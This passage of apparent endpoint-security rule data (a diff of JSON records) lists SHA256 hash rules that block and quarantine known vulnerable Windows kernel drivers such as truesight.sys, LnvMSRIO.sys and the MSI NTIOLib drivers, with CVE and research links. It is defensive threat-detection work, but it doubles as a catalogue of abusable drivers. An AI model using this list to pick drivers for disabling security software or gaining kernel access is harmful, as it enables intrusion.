[https://www.loldrivers.io/drivers/c7f76931-e24c-4d94-9e1f-5a083da581b4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8855b70-3f0c-5a37-881d-fb631a667460", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482825Z", + "creation_date": "2026-03-23T11:45:31.482829Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd9ff740c73b48deb5dde01edb84e4961aff64152fcc405edff5497b4cac2418", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b88c08be-f404-58a2-9249-cf9c85dae775", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980306Z", + "creation_date": "2026-03-23T11:45:29.980308Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980313Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9724488ca2ba4c787640c49131f4d1daae5bd47d6b2e7e5f9e8918b1d6f655be", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b893c1a0-6640-5220-a74b-6ec21d9dc4e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147113Z", + "creation_date": "2026-03-23T11:45:32.147115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcc5394705e552d0312592c507b71a6bd921782f82bb5b4acc721d2f056030a5", + "comment": "Vulnerable Kernel Driver (aka LnvMSRIO.sys) [https://blog.quarkslab.com/exploiting-lenovo-driver-cve-2025-8061.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8babd50-004a-5bea-af55-061dd1922a6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453884Z", + "creation_date": "2026-03-23T11:45:30.453887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e1a6c1e23108ede9167ffdf9ebc6af64a011bdafc57d25f84afab6c021ae7741", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8c10f77-8c2a-500e-9efb-80e9445aec96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615048Z", + "creation_date": "2026-03-23T11:45:29.615050Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615055Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8d1d6bb-3817-5fd9-a720-fa8e09eb6cdd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826384Z", + "creation_date": "2026-03-23T11:45:31.826386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "749216268b2e85c3528db4be76eda878d8c6c3605c57fa2c7a5acd11074deb71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8d3d4a7-028b-5769-9c6b-3cfe2dff7a5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811363Z", + "creation_date": "2026-03-23T11:45:31.811365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b91d3fb5e9bfafa19547e604113f506f1d4ad1d108157fbbef81a82708e8d6d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8d82f74-d647-5a8b-8c89-c27e09f96f12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493597Z", + "creation_date": "2026-03-23T11:45:31.493600Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88010b12941fee7b9f24cc6a57f990826bed907073ff55ca0f325a1aa2c23a0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8f1634e-2502-5dae-aac9-22e2a4371d91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493087Z", + "creation_date": 
"2026-03-23T11:45:31.493090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493099Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "101b95e50f005d464c583d826574639ae8f1d03fa2cc83345ae2b8b53f93a772", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8f6de7d-77c9-5a2a-8966-3fd8b03ee0a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616185Z", + "creation_date": "2026-03-23T11:45:29.616187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63041a13d1658e22fecc34706e98ab08b54b94e7d028bf2b1308ff85995a01c3", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8f98719-b497-5bbf-9a93-1d0e9679f5de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476242Z", + "creation_date": "2026-03-23T11:45:30.476245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1c78c8ba70368e96515fb0596598938a8f9efa8f9f5d9e068ee008f03020fee", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8ff4ac5-46ca-5ad3-993a-f94b148ac0c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614631Z", + "creation_date": 
"2026-03-23T11:45:29.614633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9041cd3-6bef-5804-8faf-c6883393024e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833865Z", + "creation_date": "2026-03-23T11:45:30.833885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f784d2666fac241c31cec0cc285d228662d509ec75678565d4a63d5a4712c7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b91f3844-6497-5ebf-a091-3ab60f51c63b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818006Z", + "creation_date": "2026-03-23T11:45:31.818009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5adfedbb426cac12472d6122217cc34b32c1272870087132e6d3cc286a357e13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b92ef931-edc5-5b78-a11b-07098fb08583", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824611Z", + "creation_date": "2026-03-23T11:45:30.824614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.824622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "384f2761d6f92727598e6b0ba36dbe2187b4798631302dbf5f0692bd52383b98", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b93198b3-99db-50f5-ad34-eee3fdc33f5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822344Z", + "creation_date": "2026-03-23T11:45:31.822346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c881a4023af4368404f13117cc068690f718c73077c2560846924b241814ef81", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b932b1fb-b062-5a92-8e1d-90008cd17b12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141042Z", + "creation_date": "2026-03-23T11:45:31.141044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50eaae094acb573f290dbee057df37b308d0e1405b56ff33c69beee9e5913a17", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9369005-bb9d-5009-a8c6-e1607d617f68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472721Z", + "creation_date": "2026-03-23T11:45:31.472724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5e76fd04dc733abf48dff452b3be8cf09a1ad2ec54333f75386431566dce502", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b93793db-e229-50aa-a424-30e40d450bc1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605138Z", + "creation_date": "2026-03-23T11:45:29.605140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9c121b6d68ce8ea989142ac98bd63e055b1fc9b720713e735569552503e362a", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b938dd8e-1d52-5993-aab3-ac8a52e60430", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617538Z", + "creation_date": "2026-03-23T11:45:29.617540Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94111de210f6b3b48dda16b3422f0f9180e30bcb5765b6858c451d1d89196199", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9556a25-65a4-5e32-9664-87f40587b349", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829272Z", + "creation_date": "2026-03-23T11:45:30.829274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9d6b6784b5616ea4ed45d1910502919676e93a7c0af895c879adff580cec18d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b967fb15-74a6-5e0a-a7cb-78fc5e6f5f12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144777Z", + "creation_date": "2026-03-23T11:45:31.144779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "137f68f02f7ce1c085474d0a61ee460ea597db6420c5930bd6dba282f329bf20", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b968cbd6-cf44-5bc0-915c-18bc6ab5e700", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477192Z", + 
"creation_date": "2026-03-23T11:45:31.477196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477206Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b96438e685eff2d464e63035f5a6bd7f5a04bdcb9ad29d75d5143b79d1a94835", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b96f6d3b-d4ca-544b-b693-66ce8d4aebab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499377Z", + "creation_date": "2026-03-23T11:45:31.499408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499416Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "420bece9efaa2836e412bc552d46c18a47f5623a1cefad4e58f6d33e09d29683", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
